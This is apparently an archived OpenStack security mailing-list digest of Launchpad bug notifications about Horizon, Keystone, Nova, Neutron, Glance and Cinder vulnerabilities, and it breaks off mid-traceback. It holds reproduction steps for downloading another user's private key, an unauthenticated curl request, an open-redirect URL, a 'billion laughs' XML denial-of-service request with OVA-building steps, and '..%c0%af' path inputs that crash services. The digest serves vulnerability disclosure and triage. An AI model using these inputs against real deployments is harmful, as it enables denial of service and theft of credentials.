<20160920124156.32348.22876.malonedeb@wampee.canonical.com> Message-ID: <20160927151629.24708.37086.malone@soybean.canonical.com> It seems like the download link does in fact create the key first, so another user will download another (newly generated) key. Can someone please confirm before we close this bug. -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625619 Title: It is possible to download key pair for other user at the same project Status in OpenStack Dashboard (Horizon): New Status in OpenStack Identity (keystone): New Status in OpenStack Security Advisory: Incomplete Bug description: Bug was reproduced in mitaka openstack release. Steps to reproduce: 1. Login to horizon. 2. Click Project-> Compute -> Access and Security 3. Click "Key Pairs" tab 4. Click "Create Key Pair" button, enter keypair name. 5. On the next screen with download key dialog copy URL from browser URL field URL will be like http://server/horizon/project/access_and_security/keypairs//download 6. Click cancel to close download window. 7. Click Project->Compute->Instances. 8. In opened window select other key pair name from KEY PAIR column (it could be key pair for different user) 9. open new browser window, paste URL string from step 5. 10. Change in URL with name obtained from step 8 and press enter You will be prompted to download private key for other user. It isn't correct user should be able to download only his own keys To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1625619/+subscriptions From tdecacqu at redhat.com Tue Sep 27 15:19:45 2016 From: tdecacqu at redhat.com (Tristan Cacqueray) Date: Tue, 27 Sep 2016 15:19:45 -0000 Subject: [Openstack-security] [Bug 1621626] Re: Unauthenticated requests return information References: <20160908210003.13656.43704.malonedeb@wampee.canonical.com> Message-ID: <20160927151946.24102.92745.malone@gac.canonical.com> This seems like it requires some sort of UUID guessing, thus I suggest a class D according to the VMT taxonomy ( https://security.openstack.org /vmt-process.html#incident-report-taxonomy ). ** Information type changed from Private Security to Public ** Tags added: security -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1621626 Title: Unauthenticated requests return information Status in OpenStack Identity (keystone): New Status in OpenStack Security Advisory: Incomplete Bug description: I can get information back on an unauthenticated request. $ curl http://192.168.122.126:35357/v3/projects/8d34a533f85b423e8589061cde451edd/users/68ec7d9b6e464649b11d1340d5e05666/roles/ca314e7f7faf4f948bf6e7cf2077806e {"error": {"message": "Could not find role: ca314e7f7faf4f948bf6e7cf2077806e", "code": 404, "title": "Not Found"}} This should have returned 401 Unauthenticated, like this: $ curl http://192.168.122.126:35357/v3/projects {"error": {"message": "The request you have made requires authentication.", "code": 401, "title": "Unauthorized"}} To recreate, just start up devstack on stable/mitaka and do the above request. I tried this on master and it's fixed. Probably by https://review.openstack.org/#/c/339356/ To manage notifications about this bug go to: https://bugs.launchpad.net/keystone/+bug/1621626/+subscriptions From fungi at yuggoth.org Tue Sep 27 15:33:06 2016 From: fungi at yuggoth.org (Jeremy Stanley) Date: Tue, 27 Sep 2016 15:33:06 -0000 Subject: [Openstack-security] [Bug 1625833] Re: Prevent open redirects as a result of workflow action References: <20160920214728.9448.43144.malonedeb@chaenomeles.canonical.com> Message-ID: <20160927153308.27730.73150.launchpad@chaenomeles.canonical.com> ** Changed in: horizon Status: New => In Progress ** Information type changed from Public Security to Public ** Tags added: security -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625833 Title: Prevent open redirects as a result of workflow action Status in OpenStack Dashboard (Horizon): In Progress Status in OpenStack Security Advisory: Won't Fix Bug description: For example: /admin/flavors/create/?next=http://www.foobar.com/ If a user is tricked into clicking that link, the flavor create workflow will be shown, but the redirect on form post will unexpectedly take the user to another site. Prevent this by checking that the next_url in WorkflowView.post is same origin. To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1625833/+subscriptions From fungi at yuggoth.org Tue Sep 27 15:36:41 2016 From: fungi at yuggoth.org (Jeremy Stanley) Date: Tue, 27 Sep 2016 15:36:41 -0000 Subject: [Openstack-security] [Bug 1618879] Re: iptables rule always be thrashed when update a little rule References: <20160831130211.12061.23842.malonedeb@chaenomeles.canonical.com> Message-ID: <20160927153641.23919.50200.malone@gac.canonical.com> I agree with Tristan, this looks like a security hardening opportunity. ** Changed in: ossa Status: Incomplete => Won't Fix ** Information type changed from Public Security to Public ** Tags added: security -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1618879 Title: iptables rule always be thrashed when update a little rule Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: When update meter label or rule, iptables_manager will update iptables rule in router's namespace. In order to, it will clean traffic counter number collected in interval time, the other iptables always trashing that will clean old iptalbes rule and generate new same significance iptables rule. the example from update meter label: Generated by iptables_manager *filter :neutron-meter-neutron-met - [0:0] :neutron-meter-r-00599199-632 - [0:0] -I FORWARD 2 -j neutron-meter-FORWARD -D FORWARD 4 -I INPUT 1 -j neutron-meter-INPUT -D INPUT 3 -I OUTPUT 2 -j neutron-meter-OUTPUT -D OUTPUT 4 -I neutron-filter-top 1 -j neutron-meter-local -D neutron-filter-top 3 -D neutron-meter-l-00e4e019-099 1 -I neutron-meter-l-00e4e019-099 1 -D neutron-meter-l-01e4e019-099 1 -I neutron-meter-l-01e4e019-099 1 -I neutron-meter-r-00599199-632 1 -i qg-f0732f6f-8e -d 192.168.10.0/24 -j neutron-meter-l-00599199-632 COMMIT # Completed by iptables_manager # Generated by iptables_manager *raw -I OUTPUT 1 -j neutron-meter-OUTPUT -D OUTPUT 3 -I PREROUTING 1 -j neutron-meter-PREROUTING -D PREROUTING 3 COMMIT # Completed by iptables_manager To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1618879/+subscriptions From 1625619 at bugs.launchpad.net Tue Sep 27 15:50:40 2016 From: 1625619 at bugs.launchpad.net (Steve Martinelli) Date: Tue, 27 Sep 2016 15:50:40 -0000 Subject: [Openstack-security] [Bug 1625619] Re: It is possible to download key pair for other user at the same project References: <20160920124156.32348.22876.malonedeb@wampee.canonical.com> Message-ID: <20160927155040.22900.34637.launchpad@gac.canonical.com> ** Also affects: nova Importance: Undecided Status: New -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625619 Title: It is possible to download key pair for other user at the same project Status in OpenStack Dashboard (Horizon): New Status in OpenStack Identity (keystone): New Status in OpenStack Compute (nova): New Status in OpenStack Security Advisory: Incomplete Bug description: Bug was reproduced in mitaka openstack release. Steps to reproduce: 1. Login to horizon. 2. Click Project-> Compute -> Access and Security 3. Click "Key Pairs" tab 4. Click "Create Key Pair" button, enter keypair name. 5. On the next screen with download key dialog copy URL from browser URL field URL will be like http://server/horizon/project/access_and_security/keypairs//download 6. Click cancel to close download window. 7. Click Project->Compute->Instances. 8. In opened window select other key pair name from KEY PAIR column (it could be key pair for different user) 9. open new browser window, paste URL string from step 5. 10. Change in URL with name obtained from step 8 and press enter You will be prompted to download private key for other user. It isn't correct user should be able to download only his own keys To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1625619/+subscriptions From fungi at yuggoth.org Tue Sep 27 16:07:16 2016 From: fungi at yuggoth.org (Jeremy Stanley) Date: Tue, 27 Sep 2016 16:07:16 -0000 Subject: [Openstack-security] [Bug 1625619] Re: It is possible to download key pair for other user at the same project References: <20160920124156.32348.22876.malonedeb@wampee.canonical.com> Message-ID: <20160927160718.24229.20780.launchpad@soybean.canonical.com> ** Information type changed from Public to Public Security -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625619 Title: It is possible to download key pair for other user at the same project Status in OpenStack Dashboard (Horizon): New Status in OpenStack Identity (keystone): New Status in OpenStack Compute (nova): New Status in OpenStack Security Advisory: Incomplete Bug description: Bug was reproduced in mitaka openstack release. Steps to reproduce: 1. Login to horizon. 2. Click Project-> Compute -> Access and Security 3. Click "Key Pairs" tab 4. Click "Create Key Pair" button, enter keypair name. 5. On the next screen with download key dialog copy URL from browser URL field URL will be like http://server/horizon/project/access_and_security/keypairs//download 6. Click cancel to close download window. 7. Click Project->Compute->Instances. 8. In opened window select other key pair name from KEY PAIR column (it could be key pair for different user) 9. open new browser window, paste URL string from step 5. 10. Change in URL with name obtained from step 8 and press enter You will be prompted to download private key for other user. It isn't correct user should be able to download only his own keys To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1625619/+subscriptions From fungi at yuggoth.org Tue Sep 27 16:10:02 2016 From: fungi at yuggoth.org (Jeremy Stanley) Date: Tue, 27 Sep 2016 16:10:02 -0000 Subject: [Openstack-security] [Bug 1621626] Re: Unauthenticated requests return information References: <20160908210003.13656.43704.malonedeb@wampee.canonical.com> Message-ID: <20160927161002.24066.97747.malone@soybean.canonical.com> I agree this seems like class D (security hardening), though if the case is made that there is a legitimate vulnerability here then the need to guess UUIDs to exploit it would make it class C1 instead. -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1621626 Title: Unauthenticated requests return information Status in OpenStack Identity (keystone): New Status in OpenStack Security Advisory: Incomplete Bug description: I can get information back on an unauthenticated request. $ curl http://192.168.122.126:35357/v3/projects/8d34a533f85b423e8589061cde451edd/users/68ec7d9b6e464649b11d1340d5e05666/roles/ca314e7f7faf4f948bf6e7cf2077806e {"error": {"message": "Could not find role: ca314e7f7faf4f948bf6e7cf2077806e", "code": 404, "title": "Not Found"}} This should have returned 401 Unauthenticated, like this: $ curl http://192.168.122.126:35357/v3/projects {"error": {"message": "The request you have made requires authentication.", "code": 401, "title": "Unauthorized"}} To recreate, just start up devstack on stable/mitaka and do the above request. I tried this on master and it's fixed. Probably by https://review.openstack.org/#/c/339356/ To manage notifications about this bug go to: https://bugs.launchpad.net/keystone/+bug/1621626/+subscriptions From 1625619 at bugs.launchpad.net Tue Sep 27 16:21:40 2016 From: 1625619 at bugs.launchpad.net (Steve Martinelli) Date: Tue, 27 Sep 2016 16:21:40 -0000 Subject: [Openstack-security] [Bug 1625619] Re: It is possible to download key pair for other user at the same project References: <20160920124156.32348.22876.malonedeb@wampee.canonical.com> Message-ID: <20160927162140.24598.48366.malone@soybean.canonical.com> Adding nova to the bug report since keypairs are a nova concept. Not sure what we can do from a keystone perspective; it looks like there is policy in place to protect the keypair: https://github.com/openstack/nova/blob/6501f05af761ee205a555accfd598f0cb6305c8b/nova/policies/keypairs.py#L38-L40 -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625619 Title: It is possible to download key pair for other user at the same project Status in OpenStack Dashboard (Horizon): New Status in OpenStack Identity (keystone): New Status in OpenStack Compute (nova): New Status in OpenStack Security Advisory: Incomplete Bug description: Bug was reproduced in mitaka openstack release. Steps to reproduce: 1. Login to horizon. 2. Click Project-> Compute -> Access and Security 3. Click "Key Pairs" tab 4. Click "Create Key Pair" button, enter keypair name. 5. On the next screen with download key dialog copy URL from browser URL field URL will be like http://server/horizon/project/access_and_security/keypairs//download 6. Click cancel to close download window. 7. Click Project->Compute->Instances. 8. In opened window select other key pair name from KEY PAIR column (it could be key pair for different user) 9. open new browser window, paste URL string from step 5. 10. Change in URL with name obtained from step 8 and press enter You will be prompted to download private key for other user. It isn't correct user should be able to download only his own keys To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1625619/+subscriptions From fungi at yuggoth.org Tue Sep 27 18:50:29 2016 From: fungi at yuggoth.org (Jeremy Stanley) Date: Tue, 27 Sep 2016 18:50:29 -0000 Subject: [Openstack-security] [Bug 1625402] Re: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py References: <20160920002310.32086.46442.malonedeb@wampee.canonical.com> Message-ID: <20160927185029.23535.45964.malone@soybean.canonical.com> Agreed on the already public nature of this, I've switched the status accordingly. ** Information type changed from Private Security to Public -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625402 Title: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py Status in Glance: Opinion Status in OpenStack Security Advisory: Opinion Bug description: This issue is being treated as a potential security risk under embargo. Please do not make any public mention of embargoed (private) security vulnerabilities before their coordinated publication by the OpenStack Vulnerability Management Team in the form of an official OpenStack Security Advisory. This includes discussion of the bug or associated fixes in public forums such as mailing lists, code review systems and bug trackers. Please also avoid private disclosure to other individuals not already approved for access to this information, and provide this same reminder to those who are made aware of the issue prior to publication. All discussion should remain confined to this private bug report, and any proposed fixes should be added to the bug as attachments. Creating a task to import an OVA file with a malicious OVF file inside it will result in significant memory usage by the glance-api process. This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing. As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" vulnerability when parsing untrusted input [3] Note: if using a devstack instance, you will need to edit the "work_dir" variable in /etc/glance/glance-api.conf to point to a real folder. ----------------------------------------- Example request ----------------------------------------- POST /v2/tasks HTTP/1.1 Host: localhost:1338 Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.1 Content-Type: application/json X-Auth-Token: [ADMIN TOKEN] Content-Length: 287 {     "type": "import",     "input": {         "import_from": "http://127.0.0.1:9090/laugh.ova",         "import_from_format": "raw",         "image_properties": {             "disk_format": "raw",             "container_format": "ova",      "name": "laugh"         }     } } ----------------------------------------- Creating the malicious OVA/OVF ----------------------------------------- "laugh.ova" can be created like so: 1. Copy this into a file called "laugh.ovf":                       ]> &lol10; 2. Create the OVA file (tarball) with the "tar" utility:     $ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova 3. (Optional) If you want to serve this from your devstack instance (as in the request above), run this in the folder where you created the OVA file:     $ python -m SimpleHTTPServer 9090 ----------------------------------------- Performance impact ----------------------------------------- Profiling my VM from a fresh boot: $ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting this task twice (repeating calls to the above command): Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 817244 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting enough of these requests at once, glance-api runs out of memory and can't restart itself. Here's what the log looks like after the "killer request" [4] ----------------------------------------- Mitigation ----------------------------------------- Any instances of xml.etree should be replaced with their equivalent in a secure XML parsing library like defusedxml [5] 1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24 2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184 3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities 4: https://gist.github.com/cneill/5265d887e0125c0e20254282a6d8ae64 5: https://pypi.python.org/pypi/defusedxml ----------------------------------------- Other ----------------------------------------- Thanks to Rahul Nair from the OpenStack Security Project for bringing the ovf_process file to my attention in the first place. We are testing Glance for security defects as part of OSIC, using our API security testing tool called Syntribos (https://github.com/openstack/syntribos), and Bandit (which was used to discover this issue). To manage notifications about this bug go to: https://bugs.launchpad.net/glance/+bug/1625402/+subscriptions From fungi at yuggoth.org Tue Sep 27 18:47:59 2016 From: fungi at yuggoth.org (Jeremy Stanley) Date: Tue, 27 Sep 2016 18:47:59 -0000 Subject: [Openstack-security] [Bug 1621626] Re: Unauthenticated requests return information References: <20160908210003.13656.43704.malonedeb@wampee.canonical.com> Message-ID: <20160927184801.23622.51203.launchpad@gac.canonical.com> ** Changed in: ossa Status: Incomplete => Won't Fix -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1621626 Title: Unauthenticated requests return information Status in OpenStack Identity (keystone): New Status in OpenStack Security Advisory: Won't Fix Bug description: I can get information back on an unauthenticated request. $ curl http://192.168.122.126:35357/v3/projects/8d34a533f85b423e8589061cde451edd/users/68ec7d9b6e464649b11d1340d5e05666/roles/ca314e7f7faf4f948bf6e7cf2077806e {"error": {"message": "Could not find role: ca314e7f7faf4f948bf6e7cf2077806e", "code": 404, "title": "Not Found"}} This should have returned 401 Unauthenticated, like this: $ curl http://192.168.122.126:35357/v3/projects {"error": {"message": "The request you have made requires authentication.", "code": 401, "title": "Unauthorized"}} To recreate, just start up devstack on stable/mitaka and do the above request. I tried this on master and it's fixed. Probably by https://review.openstack.org/#/c/339356/ To manage notifications about this bug go to: https://bugs.launchpad.net/keystone/+bug/1621626/+subscriptions From 1621626 at bugs.launchpad.net Tue Sep 27 20:40:19 2016 From: 1621626 at bugs.launchpad.net (Steve Martinelli) Date: Tue, 27 Sep 2016 20:40:19 -0000 Subject: [Openstack-security] [Bug 1621626] Re: Unauthenticated requests return information References: <20160908210003.13656.43704.malonedeb@wampee.canonical.com> Message-ID: <20160927204019.23707.12095.malone@gac.canonical.com> This is fixed in master (as stated in the bug report), we could backport the fix to Mitaka as it's a security issue, albeit a minor one. I'm OK with backporting the fix, but I'm also OK with not backporting it (IIRC there were one or two other patches that needed to land after https://review.openstack.org/#/c/339356/ merged). I agree with the class D assessment. ** Also affects: keystone/mitaka Importance: Undecided Status: New ** Changed in: keystone Status: New => Fix Released -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1621626 Title: Unauthenticated requests return information Status in OpenStack Identity (keystone): Fix Released Status in OpenStack Identity (keystone) mitaka series: New Status in OpenStack Security Advisory: Won't Fix Bug description: I can get information back on an unauthenticated request. $ curl http://192.168.122.126:35357/v3/projects/8d34a533f85b423e8589061cde451edd/users/68ec7d9b6e464649b11d1340d5e05666/roles/ca314e7f7faf4f948bf6e7cf2077806e {"error": {"message": "Could not find role: ca314e7f7faf4f948bf6e7cf2077806e", "code": 404, "title": "Not Found"}} This should have returned 401 Unauthenticated, like this: $ curl http://192.168.122.126:35357/v3/projects {"error": {"message": "The request you have made requires authentication.", "code": 401, "title": "Unauthorized"}} To recreate, just start up devstack on stable/mitaka and do the above request. I tried this on master and it's fixed. Probably by https://review.openstack.org/#/c/339356/ To manage notifications about this bug go to: https://bugs.launchpad.net/keystone/+bug/1621626/+subscriptions From 1621626 at bugs.launchpad.net Tue Sep 27 20:41:18 2016 From: 1621626 at bugs.launchpad.net (Steve Martinelli) Date: Tue, 27 Sep 2016 20:41:18 -0000 Subject: [Openstack-security] [Bug 1621626] Re: Unauthenticated requests return information References: <20160908210003.13656.43704.malonedeb@wampee.canonical.com> Message-ID: <20160927204118.17392.35955.malone@wampee.canonical.com> Added the mitaka series since it's fixed in master -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1621626 Title: Unauthenticated requests return information Status in OpenStack Identity (keystone): Fix Released Status in OpenStack Identity (keystone) mitaka series: New Status in OpenStack Security Advisory: Won't Fix Bug description: I can get information back on an unauthenticated request. $ curl http://192.168.122.126:35357/v3/projects/8d34a533f85b423e8589061cde451edd/users/68ec7d9b6e464649b11d1340d5e05666/roles/ca314e7f7faf4f948bf6e7cf2077806e {"error": {"message": "Could not find role: ca314e7f7faf4f948bf6e7cf2077806e", "code": 404, "title": "Not Found"}} This should have returned 401 Unauthenticated, like this: $ curl http://192.168.122.126:35357/v3/projects {"error": {"message": "The request you have made requires authentication.", "code": 401, "title": "Unauthorized"}} To recreate, just start up devstack on stable/mitaka and do the above request. I tried this on master and it's fixed. Probably by https://review.openstack.org/#/c/339356/ To manage notifications about this bug go to: https://bugs.launchpad.net/keystone/+bug/1621626/+subscriptions From charles.neill at rackspace.com Wed Sep 28 00:22:27 2016 From: charles.neill at rackspace.com (Charles Neill) Date: Wed, 28 Sep 2016 00:22:27 -0000 Subject: [Openstack-security] [Bug 1613901] Re: String "..%c0%af" causes 500 errors in multiple locations in Keystone v3 References: <20160816233137.14656.30722.malonedeb@soybean.canonical.com> Message-ID: <20160928002227.27619.20497.malone@chaenomeles.canonical.com> This affects a number of other OpenStack projects in a similar way, including: - Neutron - Cinder - Glance More projects may be affected that we are unaware of. ===================================================== Example traceback from Neutron ===================================================== 2016-09-28 00:16:43.342 1218 DEBUG neutron.wsgi [-] (1218) accepted ('10.0.2.2', 50029) server /usr/local/lib/python2.7/dist-packages/eventlet/wsgi.py:868 Traceback (most recent call last): File "/usr/lib/python2.7/logging/__init__.py", line 851, in emit msg = self.format(record) File "/usr/local/lib/python2.7/dist-packages/oslo_log/handlers.py", line 76, in format return logging.StreamHandler.format(self, record) File "/usr/lib/python2.7/logging/__init__.py", line 724, in format return fmt.format(record) File "/usr/local/lib/python2.7/dist-packages/oslo_log/formatters.py", line 297, in format return logging.Formatter.format(self, record) File "/usr/lib/python2.7/logging/__init__.py", line 464, in format record.message = record.getMessage() File "/usr/lib/python2.7/logging/__init__.py", line 328, in getMessage msg = msg % self.args File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 1164, in as_text bytes = self.as_bytes() File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 1135, in as_bytes url = self.url File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 504, in url url = self.path_url File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 476, in path_url bpath_info = bytes_(self.path_info, self.url_encoding) File "/usr/local/lib/python2.7/dist-packages/webob/descriptors.py", line 68, in fget return req.encget(key, encattr=encattr) File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 177, in encget return val.decode(encoding) File "/usr/lib/python2.7/encodings/utf_8.py", line 16, in decode return codecs.utf_8_decode(input, errors, True) UnicodeDecodeError: 'utf8' codec can't decode byte 0xc0 in position 11: invalid start byte Logged from file catch_errors.py, line 41 2016-09-28 00:16:43.489 1218 INFO neutron.wsgi [req-37cfe540-c134-4ec0-91d2-56687f38ffd5 admin -] 10.0.2.2 - - [28/Sep/2016 00:16:43] "PUT /v2.0/flavors/..%c0%af HTTP/1.1" 500 414 0.140984 ===================================================== Example traceback from Cinder ===================================================== 2016-09-27 23:50:00.142 5986 DEBUG eventlet.wsgi.server [-] (5986) accepted ('10.0.2.2', 49862) server /usr/local/lib/python2.7/dist-packages/eventlet/wsgi.py:868 2016-09-27 23:50:00.198 ERROR cinder.api.middleware.fault [req-7ec3610c-9cdc-4f7d-b69c-36c385d0fa10 admin] Caught error: 'utf8' codec can't decode byte 0xc0 in position 3: invalid start byte 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault Traceback (most recent call last): 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault File "/opt/stack/cinder/cinder/api/middleware/fault.py", line 79, in __call__ 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault return req.get_response(self.application) 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 1299, in send 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault application, catch_exc_info=False) 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 1263, in call_application 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault app_iter = application(self.environ, start_response) 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault File "/usr/local/lib/python2.7/dist-packages/webob/dec.py", line 130, in __call__ 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault resp = self.call_func(req, *args, **self.kwargs) 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault File "/usr/local/lib/python2.7/dist-packages/webob/dec.py", line 195, in call_func 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault return self.func(req, *args, **kwargs) 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault File "/usr/local/lib/python2.7/dist-packages/keystonemiddleware/auth_token/__init__.py", line 323, in __call__ 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault response = req.get_response(self._app) 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 1299, in send 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault application, catch_exc_info=False) 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 1263, in call_application 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault app_iter = application(self.environ, start_response) 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault File "/usr/local/lib/python2.7/dist-packages/webob/dec.py", line 144, in __call__ 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault return resp(environ, start_response) 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault File "/usr/local/lib/python2.7/dist-packages/webob/dec.py", line 144, in __call__ 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault return resp(environ, start_response) 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault File "/usr/local/lib/python2.7/dist-packages/routes/middleware.py", line 141, in __call__ 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault response = self.app(environ, start_response) 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault File "/usr/local/lib/python2.7/dist-packages/webob/dec.py", line 144, in __call__ 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault return resp(environ, start_response) 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault File "/usr/local/lib/python2.7/dist-packages/webob/dec.py", line 130, in __call__ 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault resp = self.call_func(req, *args, **self.kwargs) 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault File "/usr/local/lib/python2.7/dist-packages/webob/dec.py", line 195, in call_func 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault return self.func(req, *args, **kwargs) 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault File "/opt/stack/cinder/cinder/api/openstack/wsgi.py", line 817, in __call__ 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault "url": request.url}) 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 504, in url 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault url = self.path_url 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 476, in path_url 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault bpath_info = bytes_(self.path_info, self.url_encoding) 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault File "/usr/local/lib/python2.7/dist-packages/webob/descriptors.py", line 68, in fget 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault return req.encget(key, encattr=encattr) 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault File "/usr/local/lib/python2.7/dist-packages/webob/request.py", line 177, in encget 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault return val.decode(encoding) 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault File "/usr/lib/python2.7/encodings/utf_8.py", line 16, in decode 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault return codecs.utf_8_decode(input, errors, True) 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault UnicodeDecodeError: 'utf8' codec can't decode byte 0xc0 in position 3: invalid start byte 2016-09-27 23:50:00.198 5986 ERROR cinder.api.middleware.fault 2016-09-27 23:50:00.224 INFO eventlet.wsgi.server [req-7ec3610c-9cdc-4f7d-b69c-36c385d0fa10 admin] Traceback (most recent call last): File "/usr/local/lib/python2.7/dist-packages/eventlet/wsgi.py", line 481, in handle_one_response result = self.application(self.environ, start_response) File "/usr/local/lib/python2.7/dist-packages/paste/urlmap.py", line 216, in __call__ return app(environ, start_response) File "/usr/local/lib/python2.7/dist-packages/webob/dec.py", line 130, in __call__ resp = 